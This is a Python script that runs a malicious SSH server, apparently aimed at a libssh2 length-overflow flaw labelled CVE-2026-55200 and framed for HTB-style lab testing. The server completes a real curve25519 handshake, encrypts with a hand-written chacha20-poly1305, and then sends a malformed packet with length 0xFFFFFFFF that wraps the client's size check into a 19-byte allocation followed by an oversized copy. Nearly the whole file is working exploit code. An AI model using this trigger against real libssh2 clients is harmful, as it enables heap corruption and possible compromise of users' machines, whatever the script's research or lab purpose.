#!/usr/bin/env python3 import argparse import hashlib import os import queue import socket import struct import sys import threading import time import traceback from dataclasses import dataclass from cryptography.hazmat.primitives import hashes, serialization from cryptography.hazmat.primitives.asymmetric import padding, rsa, x25519 HOST = "" PORT = 0 SERVER_IDENT = b"SSH-2.0-libpwn-cve-2026-55200" LIBSSH2_PACKET_MAXPAYLOAD = 35000 DEFAULT_PACKET_LENGTH = 0xFFFFFFFF DEFAULT_AUTH_LEN = 16 DEFAULT_MAC_LEN = 0 CLIENT_IDENT = b"SSH-2.0-libpwn-local-libssh2-mock" KEX_ALGORITHMS = [ "curve25519-sha256", "curve25519-sha256@libssh.org", ] HOSTKEY_ALGORITHMS = [ "rsa-sha2-256", "ssh-rsa", ] CIPHER_ALGORITHMS = [ "chacha20-poly1305@openssh.com", ] MAC_ALGORITHMS = [ "hmac-sha2-256", "hmac-sha1", ] COMP_ALGORITHMS = [ "none", ] def u32(value): return struct.pack(">I", value & 0xFFFFFFFF) def read_exact(sock, size): out = bytearray() while len(out) < size: chunk = sock.recv(size - len(out)) if not chunk: raise EOFError("connection closed while reading") out += chunk return bytes(out) def ssh_string(data): if isinstance(data, str): data = data.encode() return u32(len(data)) + data def ssh_name_list(items): return ssh_string(",".join(items).encode()) def mpint_bytes(value): if value == 0: return b"" raw = value.to_bytes((value.bit_length() + 7) // 8, "big") if raw[0] & 0x80: raw = b"\x00" + raw return raw def ssh_mpint(value): return ssh_string(mpint_bytes(value)) def read_ssh_string(buf, offset): if offset + 4 > len(buf): raise ValueError("short SSH string length") size = struct.unpack(">I", buf[offset:offset + 4])[0] offset += 4 if offset + size > len(buf): raise ValueError("short SSH string body") return buf[offset:offset + size], offset + size def split_namelist(raw): if not raw: return [] return raw.decode(errors="strict").split(",") def first_match(client_items, server_items, label): for item in client_items: if item in server_items: return item raise RuntimeError(f"client did not offer required {label}; got {client_items!r}") def build_plain_packet(payload, block_size=8): padding_len = (-(len(payload) + 5)) % block_size if padding_len < 4: padding_len += block_size packet_length = len(payload) + 1 + padding_len return u32(packet_length) + bytes([padding_len]) + payload + os.urandom(padding_len) def parse_plain_packet(packet): if len(packet) < 5: raise ValueError("plain packet too short") packet_length = struct.unpack(">I", packet[:4])[0] padding_len = packet[4] if packet_length + 4 != len(packet): raise ValueError("packet length mismatch") if padding_len + 1 > packet_length: raise ValueError("invalid padding length") return packet[5:4 + packet_length - padding_len] def read_plain_packet(sock, max_packet=1024 * 1024): packet_length = struct.unpack(">I", read_exact(sock, 4))[0] if packet_length < 1 or packet_length > max_packet: raise ValueError(f"refusing plain packet_length={packet_length}") body = read_exact(sock, packet_length) return parse_plain_packet(u32(packet_length) + body) def send_plain_packet(sock, payload): sock.sendall(build_plain_packet(payload)) def read_ident(sock): buf = bytearray() while True: ch = read_exact(sock, 1) if ch == b"\n": line = bytes(buf).rstrip(b"\r") if line.startswith(b"SSH-"): return line buf.clear() continue buf += ch if len(buf) > 4096: raise ValueError("SSH banner line too long") def build_kexinit_payload(): payload = bytearray() payload.append(20) payload += os.urandom(16) payload += ssh_name_list(KEX_ALGORITHMS) payload += ssh_name_list(HOSTKEY_ALGORITHMS) payload += ssh_name_list(CIPHER_ALGORITHMS) payload += ssh_name_list(CIPHER_ALGORITHMS) payload += ssh_name_list(MAC_ALGORITHMS) payload += ssh_name_list(MAC_ALGORITHMS) payload += ssh_name_list(COMP_ALGORITHMS) payload += ssh_name_list(COMP_ALGORITHMS) payload += ssh_string(b"") payload += ssh_string(b"") payload += b"\x00" payload += u32(0) return bytes(payload) def parse_kexinit_payload(payload): if not payload or payload[0] != 20: raise ValueError("expected SSH_MSG_KEXINIT") offset = 17 names = [] for _ in range(10): raw, offset = read_ssh_string(payload, offset) names.append(split_namelist(raw)) return { "kex": names[0], "hostkey": names[1], "c2s_cipher": names[2], "s2c_cipher": names[3], "c2s_mac": names[4], "s2c_mac": names[5], "c2s_comp": names[6], "s2c_comp": names[7], } def rsa_public_blob(private_key, algorithm): numbers = private_key.public_key().public_numbers() return ( ssh_string(algorithm) + ssh_string(mpint_bytes(numbers.e)) + ssh_string(mpint_bytes(numbers.n)) ) def sign_exchange_hash(private_key, hostkey_algorithm, exchange_hash): if hostkey_algorithm == "rsa-sha2-256": digest = hashes.SHA256() elif hostkey_algorithm == "ssh-rsa": digest = hashes.SHA1() else: raise ValueError(f"unsupported hostkey signature algorithm {hostkey_algorithm}") sig = private_key.sign(exchange_hash, padding.PKCS1v15(), digest) return ssh_string(hostkey_algorithm) + ssh_string(sig) def exchange_hash(client_ident, server_ident, client_kexinit, server_kexinit, hostkey_blob, client_pub, server_pub, shared_int): h = bytearray() h += ssh_string(client_ident) h += ssh_string(server_ident) h += ssh_string(client_kexinit) h += ssh_string(server_kexinit) h += ssh_string(hostkey_blob) h += ssh_string(client_pub) h += ssh_string(server_pub) h += ssh_mpint(shared_int) return hashlib.sha256(bytes(h)).digest() def derive_key(shared_int, exchange_hash_value, session_id, letter, length): seed = ssh_mpint(shared_int) + exchange_hash_value + letter + session_id out = hashlib.sha256(seed).digest() while len(out) < length: out += hashlib.sha256(ssh_mpint(shared_int) + exchange_hash_value + out).digest() return out[:length] def rotl32(value, shift): return ((value << shift) & 0xFFFFFFFF) | (value >> (32 - shift)) def quarter_round(state, a, b, c, d): state[a] = (state[a] + state[b]) & 0xFFFFFFFF state[d] = rotl32(state[d] ^ state[a], 16) state[c] = (state[c] + state[d]) & 0xFFFFFFFF state[b] = rotl32(state[b] ^ state[c], 12) state[a] = (state[a] + state[b]) & 0xFFFFFFFF state[d] = rotl32(state[d] ^ state[a], 8) state[c] = (state[c] + state[d]) & 0xFFFFFFFF state[b] = rotl32(state[b] ^ state[c], 7) def chacha20_block(key, counter, nonce8): constants = b"expand 32-byte k" state = [ int.from_bytes(constants[i:i + 4], "little") for i in range(0, 16, 4) ] state += [ int.from_bytes(key[i:i + 4], "little") for i in range(0, 32, 4) ] state += [ counter & 0xFFFFFFFF, (counter >> 32) & 0xFFFFFFFF, int.from_bytes(nonce8[:4], "little"), int.from_bytes(nonce8[4:], "little"), ] working = state[:] for _ in range(10): quarter_round(working, 0, 4, 8, 12) quarter_round(working, 1, 5, 9, 13) quarter_round(working, 2, 6, 10, 14) quarter_round(working, 3, 7, 11, 15) quarter_round(working, 0, 5, 10, 15) quarter_round(working, 1, 6, 11, 12) quarter_round(working, 2, 7, 8, 13) quarter_round(working, 3, 4, 9, 14) return b"".join( ((working[i] + state[i]) & 0xFFFFFFFF).to_bytes(4, "little") for i in range(16) ) def chacha20_xor(key, counter, nonce8, data): out = bytearray() block_counter = counter for offset in range(0, len(data), 64): stream = chacha20_block(key, block_counter, nonce8) chunk = data[offset:offset + 64] out += bytes(a ^ b for a, b in zip(chunk, stream)) block_counter = (block_counter + 1) & 0xFFFFFFFFFFFFFFFF return bytes(out) def poly1305_mac(message, key): r = int.from_bytes(key[:16], "little") r &= 0x0FFFFFFC0FFFFFFC0FFFFFFC0FFFFFFF s = int.from_bytes(key[16:], "little") p = (1 << 130) - 5 acc = 0 for offset in range(0, len(message), 16): block = message[offset:offset + 16] n = int.from_bytes(block + b"\x01", "little") acc = ((acc + n) * r) % p return ((acc + s) & ((1 << 128) - 1)).to_bytes(16, "little") def chachapoly_encrypt(key64, seqno, plaintext_without_tag): if len(key64) != 64: raise ValueError("chacha20-poly1305@openssh.com requires a 64-byte key") if len(plaintext_without_tag) < 4: raise ValueError("packet needs a 4-byte SSH packet_length") seq = seqno.to_bytes(8, "big") main_key = key64[:32] header_key = key64[32:] encrypted_len = chacha20_xor(header_key, 0, seq, plaintext_without_tag[:4]) encrypted_body = chacha20_xor(main_key, 1, seq, plaintext_without_tag[4:]) encrypted = encrypted_len + encrypted_body poly_key = chacha20_xor(main_key, 0, seq, b"\x00" * 64)[:32] return encrypted + poly1305_mac(encrypted, poly_key) def chachapoly_decrypt(key64, seqno, encrypted_with_tag): if len(encrypted_with_tag) < 20: raise ValueError("encrypted packet too short") seq = seqno.to_bytes(8, "big") main_key = key64[:32] header_key = key64[32:] encrypted = encrypted_with_tag[:-16] tag = encrypted_with_tag[-16:] poly_key = chacha20_xor(main_key, 0, seq, b"\x00" * 64)[:32] expected = poly1305_mac(encrypted, poly_key) if expected != tag: raise ValueError("poly1305 tag mismatch") packet_len = chacha20_xor(header_key, 0, seq, encrypted[:4]) body = chacha20_xor(main_key, 1, seq, encrypted[4:]) return packet_len + body def build_malformed_plain(packet_length, body_len): if body_len < 1: raise ValueError("body_len must be at least 1 so padding_length exists") return u32(packet_length) + bytes([4]) + b"A" * (body_len - 1) def build_malformed_wire(key64, seqno, packet_length, body_len, filler_len): plain = build_malformed_plain(packet_length, body_len) return chachapoly_encrypt(key64, seqno, plain) + (b"B" * filler_len) @dataclass class ArithmeticResult: accepted: bool total32: int allocation: int fixed_rejects: bool fullpacket_copy_len: int gap: int def model_vulnerable_c_expression(packet_length, mac_len=DEFAULT_MAC_LEN, auth_len=DEFAULT_AUTH_LEN): rhs32 = (packet_length + mac_len + auth_len) & 0xFFFFFFFF total32 = (4 + rhs32) & 0xFFFFFFFF accepted = packet_length >= 1 and 0 < total32 <= LIBSSH2_PACKET_MAXPAYLOAD fixed_rejects = packet_length > LIBSSH2_PACKET_MAXPAYLOAD copy_len = (packet_length - 1) & 0xFFFFFFFF gap = copy_len - total32 if accepted and copy_len > total32 else 0 return ArithmeticResult(accepted, total32, total32 if accepted else 0, fixed_rejects, copy_len, gap) def model_vulnerable32(packet_length, mac_len=DEFAULT_MAC_LEN, auth_len=DEFAULT_AUTH_LEN): total32 = (4 + packet_length + mac_len + auth_len) & 0xFFFFFFFF accepted = packet_length >= 1 and 0 < total32 <= LIBSSH2_PACKET_MAXPAYLOAD fixed_rejects = packet_length > LIBSSH2_PACKET_MAXPAYLOAD copy_len = (packet_length - 1) & 0xFFFFFFFF gap = copy_len - total32 if accepted and copy_len > total32 else 0 return ArithmeticResult(accepted, total32, total32 if accepted else 0, fixed_rejects, copy_len, gap) class MiniSSHExploitServer: def __init__(self, args): self.args = args self.host_key = rsa.generate_private_key(public_exponent=65537, key_size=2048) def serve_once(self): with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener: listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) listener.bind((self.args.listen_host, self.args.listen_port)) listener.listen(1) actual_host, actual_port = listener.getsockname() print(f"[+] listening on {actual_host}:{actual_port}") conn, addr = listener.accept() with conn: conn.settimeout(self.args.timeout) print(f"[+] client connected from {addr[0]}:{addr[1]}") self.handle_client(conn) def handle_client(self, conn): seq_out = 0 seq_in = 0 conn.sendall(SERVER_IDENT + b"\r\n") client_ident = read_ident(conn) print(f"[+] client ident: {client_ident.decode(errors='replace')}") client_kexinit = read_plain_packet(conn) seq_in += 1 client_lists = parse_kexinit_payload(client_kexinit) chosen_kex = first_match(client_lists["kex"], KEX_ALGORITHMS, "kex") chosen_hostkey = first_match(client_lists["hostkey"], HOSTKEY_ALGORITHMS, "hostkey") first_match(client_lists["s2c_cipher"], CIPHER_ALGORITHMS, "server-to-client cipher") first_match(client_lists["c2s_cipher"], CIPHER_ALGORITHMS, "client-to-server cipher") first_match(client_lists["s2c_mac"], MAC_ALGORITHMS, "server-to-client mac") first_match(client_lists["c2s_mac"], MAC_ALGORITHMS, "client-to-server mac") first_match(client_lists["s2c_comp"], COMP_ALGORITHMS, "server-to-client compression") first_match(client_lists["c2s_comp"], COMP_ALGORITHMS, "client-to-server compression") print(f"[+] negotiated {chosen_kex} / {chosen_hostkey} / chacha20-poly1305@openssh.com") server_kexinit = build_kexinit_payload() send_plain_packet(conn, server_kexinit) seq_out += 1 init_payload = read_plain_packet(conn) seq_in += 1 if not init_payload or init_payload[0] != 30: raise RuntimeError(f"expected SSH_MSG_KEX_ECDH_INIT, got {init_payload[:1]!r}") client_pub, offset = read_ssh_string(init_payload, 1) if offset != len(init_payload) or len(client_pub) != 32: raise RuntimeError("invalid curve25519 client public key") server_private = x25519.X25519PrivateKey.generate() server_pub = server_private.public_key().public_bytes( serialization.Encoding.Raw, serialization.PublicFormat.Raw, ) shared = server_private.exchange(x25519.X25519PublicKey.from_public_bytes(client_pub)) if shared == b"\x00" * 32: raise RuntimeError("invalid all-zero curve25519 shared secret") shared_int = int.from_bytes(shared, "big") hostkey_blob = rsa_public_blob(self.host_key, chosen_hostkey) h = exchange_hash(client_ident, SERVER_IDENT, client_kexinit, server_kexinit, hostkey_blob, client_pub, server_pub, shared_int) session_id = h signature = sign_exchange_hash(self.host_key, chosen_hostkey, h) reply = b"\x1f" + ssh_string(hostkey_blob) + ssh_string(server_pub) + ssh_string(signature) send_plain_packet(conn, reply) seq_out += 1 send_plain_packet(conn, b"\x15") seq_out += 1 print("[+] sent SSH_MSG_NEWKEYS") try: newkeys = read_plain_packet(conn) seq_in += 1 if newkeys != b"\x15": print(f"[!] expected client NEWKEYS, got {newkeys[:1]!r}; continuing") else: print("[+] received client SSH_MSG_NEWKEYS") except Exception as exc: print(f"[!] did not read client NEWKEYS before trigger: {exc}") key_s2c = derive_key(shared_int, h, session_id, b"D", 64) trigger_seq = seq_out wire = build_malformed_wire( key_s2c, trigger_seq, self.args.packet_length, self.args.body_len, self.args.filler_len, ) conn.sendall(wire) print(f"[+] sent malformed chacha/poly1305 trigger at server seq={trigger_seq}") print(f"[+] trigger bytes={len(wire)} packet_length=0x{self.args.packet_length:08x}") time.sleep(self.args.hold_open) def self_test(args): key = bytes(range(64)) seqno = 3 wire = build_malformed_wire(key, seqno, args.packet_length, args.body_len, args.filler_len) encrypted_part = wire[:-args.filler_len] if args.filler_len else wire decrypted = chachapoly_decrypt(key, seqno, encrypted_part) decoded_len = struct.unpack(">I", decrypted[:4])[0] arith = model_vulnerable_c_expression(args.packet_length, DEFAULT_MAC_LEN, DEFAULT_AUTH_LEN) print("[self-test] chacha20-poly1305@openssh.com packet generator") print(f"packet_length=0x{decoded_len:08x} ({decoded_len})") print(f"encrypted_fragment_len={len(encrypted_part)}") print(f"filler_len={args.filler_len}") print(f"body_len={args.body_len}") print(f"vulnerable_c_expression_accepted={arith.accepted}") print(f"vulnerable_c_expression_allocation={arith.allocation}") print(f"fixed_rejects={arith.fixed_rejects}") print(f"fullpacket_style_length={arith.fullpacket_copy_len}") print(f"allocation_gap={arith.gap}") if decoded_len != args.packet_length: raise SystemExit("[self-test] FAIL: decrypted packet_length mismatch") if not arith.accepted or arith.allocation != 19: raise SystemExit("[self-test] FAIL: arithmetic did not reach wrapped allocation=19") if not arith.fixed_rejects: raise SystemExit("[self-test] FAIL: fixed model did not reject oversized length") print("[self-test] PASS") def loopback_client(client_sock, args): client_sock.settimeout(args.timeout) server_ident = read_ident(client_sock) if server_ident != SERVER_IDENT: raise RuntimeError(f"unexpected server ident {server_ident!r}") client_sock.sendall(CLIENT_IDENT + b"\r\n") client_kexinit = build_kexinit_payload() send_plain_packet(client_sock, client_kexinit) server_kexinit = read_plain_packet(client_sock) server_lists = parse_kexinit_payload(server_kexinit) first_match(server_lists["kex"], KEX_ALGORITHMS, "server kex") first_match(server_lists["hostkey"], HOSTKEY_ALGORITHMS, "server hostkey") first_match(server_lists["s2c_cipher"], CIPHER_ALGORITHMS, "server cipher") client_private = x25519.X25519PrivateKey.generate() client_pub = client_private.public_key().public_bytes( serialization.Encoding.Raw, serialization.PublicFormat.Raw, ) send_plain_packet(client_sock, b"\x1e" + ssh_string(client_pub)) reply = read_plain_packet(client_sock) if not reply or reply[0] != 31: raise RuntimeError(f"expected SSH_MSG_KEX_ECDH_REPLY, got {reply[:1]!r}") hostkey_blob, offset = read_ssh_string(reply, 1) server_pub, offset = read_ssh_string(reply, offset) _signature, offset = read_ssh_string(reply, offset) if offset != len(reply): raise RuntimeError("trailing data in KEX_ECDH_REPLY") shared = client_private.exchange(x25519.X25519PublicKey.from_public_bytes(server_pub)) shared_int = int.from_bytes(shared, "big") h = exchange_hash(CLIENT_IDENT, SERVER_IDENT, client_kexinit, server_kexinit, hostkey_blob, client_pub, server_pub, shared_int) key_s2c = derive_key(shared_int, h, h, b"D", 64) newkeys = read_plain_packet(client_sock) if newkeys != b"\x15": raise RuntimeError(f"expected server NEWKEYS, got {newkeys[:1]!r}") send_plain_packet(client_sock, b"\x15") encrypted_len = 4 + args.body_len + 16 encrypted = read_exact(client_sock, encrypted_len) if args.filler_len: read_exact(client_sock, args.filler_len) decrypted = chachapoly_decrypt(key_s2c, 3, encrypted) decoded_len = struct.unpack(">I", decrypted[:4])[0] if decoded_len != args.packet_length: raise RuntimeError("loopback decrypted packet_length mismatch") return decoded_len, encrypted_len def loopback_test(args): left, right = socket.socketpair() result_queue = queue.Queue() def server_thread(): try: with left: left.settimeout(args.timeout) MiniSSHExploitServer(args).handle_client(left) result_queue.put(None) except Exception as exc: result_queue.put(exc) thread = threading.Thread(target=server_thread, daemon=True) thread.start() try: with right: decoded_len, encrypted_len = loopback_client(right, args) finally: thread.join(args.timeout + args.hold_open + 1) if thread.is_alive(): raise SystemExit("[loopback-test] FAIL: server thread did not exit") server_error = result_queue.get_nowait() if server_error is not None: raise server_error print("[loopback-test] minimal SSH handshake/key-derivation path") print(f"decrypted_trigger_packet_length=0x{decoded_len:08x} ({decoded_len})") print(f"encrypted_trigger_fragment_len={encrypted_len}") print("[loopback-test] PASS") def main(): parser = argparse.ArgumentParser( description="Minimal malicious SSH server/trigger for HTB-style libssh2 CVE-2026-55200 testing." ) parser.add_argument("--self-test", action="store_true", help="verify local packet crypto and CVE arithmetic") parser.add_argument("--loopback-test", action="store_true", help="verify the local SSH handshake and encrypted trigger path") parser.add_argument("--serve", action="store_true", help="listen for one libssh2 client and send the trigger") parser.add_argument("--listen-host", default=HOST, help="listen IP/interface, e.g. 0.0.0.0") parser.add_argument("--listen-port", type=int, default=PORT, help="listen port, e.g. 2222") parser.add_argument("--packet-length", type=lambda x: int(x, 0), default=DEFAULT_PACKET_LENGTH) parser.add_argument("--body-len", type=int, default=8, help="truncated encrypted body length after the 4-byte length field") parser.add_argument("--filler-len", type=int, default=64, help="extra bytes after the valid encrypted fragment/tag") parser.add_argument("--timeout", type=float, default=10.0) parser.add_argument("--hold-open", type=float, default=1.0) args = parser.parse_args() if args.self_test: self_test(args) return if args.loopback_test: loopback_test(args) return if args.serve: if not args.listen_host or not args.listen_port: raise SystemExit("set --listen-host and --listen-port; the HOST/PORT section is intentionally open") MiniSSHExploitServer(args).serve_once() return parser.print_help() if __name__ == "__main__": try: main() except KeyboardInterrupt: raise except Exception: traceback.print_exc() sys.exit(1)